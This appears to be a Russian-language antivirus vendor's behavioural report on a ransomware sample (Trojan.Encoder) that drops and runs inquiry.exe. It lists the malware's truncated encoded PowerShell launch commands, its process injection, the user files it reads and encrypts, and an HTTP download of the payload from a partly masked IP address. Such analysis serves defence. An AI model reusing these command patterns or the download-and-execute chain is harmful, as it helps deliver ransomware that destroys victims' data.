Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' & /c pOwERshELl -E ZgB1AG4AYwB0AGkAbwBuACAAagBDAG0AbABDAGUAagBPAEwASgBNAE0AZQBUAHIAbgBMAGIAdwA4AEcAeQBEACAAKAAgACQAQwByAGgAYgBWADgAUABiAFcAVABZAFQAVABXACAALAAgACQAQQBiAGcAQQBZAHkAeABfAHoAX...
Внедряет код в
следующие пользовательские процессы:
- inquiry.exe
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\4f0bf7ff71f28.jpeg
- %HOMEPATH%\desktop\about.htm
- %HOMEPATH%\desktop\alert.htm
- %HOMEPATH%\desktop\alert.html
- %HOMEPATH%\desktop\coffee.bmp
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\glidescope_review_rev_010.docx
- %HOMEPATH%\desktop\howto-index.html
- %HOMEPATH%\desktop\iisstart.htm
- %HOMEPATH%\desktop\ituneshelpunavailable.htm
- %HOMEPATH%\desktop\ituneshelpunavailable.html
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\parnas_01.jpeg
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\tileimage.bmp
- %HOMEPATH%\desktop\weeklysheet1215.doc
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\inquiry.exe
- %APPDATA%\inquire\inquiry.exe
- %APPDATA%\inquire\inquiry.exe:zoneidentifier
Изменяет множество файлов пользовательских данных (Trojan.Encoder).
Изменяет расширения файлов пользовательских данных (Trojan.Encoder).
Сетевая активность
TCP
Запросы HTTP GET
- http://15#.#06.2.103/Inquiry.exe
Другое
Создает и запускает на исполнение
- '%TEMP%\inquiry.exe'
- '%APPDATA%\inquire\inquiry.exe'
- '%APPDATA%\inquire\inquiry.exe' 2 2492 1179031
- '<SYSTEM32>\cmd.exe' & /c pOwERshELl -E ZgB1AG4AYwB0AGkAbwBuACAAagBDAG0AbABDAGUAagBPAEwASgBNAE0AZQBUAHIAbgBMAGIAdwA4AEcAeQBEACAAKAAgACQAQwByAGgAYgBWADgAUABiAFcAVABZAFQAVABXACAALAAgACQAQQBiAGcAQQBZAHkAeABfAHoAX...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E ZgB1AG4AYwB0AGkAbwBuACAAagBDAG0AbABDAGUAagBPAEwASgBNAE0AZQBUAHIAbgBMAGIAdwA4AEcAeQBEACAAKAAgACQAQwByAGgAYgBWADgAUABiAFcAVABZAFQAVABXACAALAAgACQAQQBiAGcAQQBZAHkAeABfAHoAXwBGADEARABUAE0AYgBVAD...
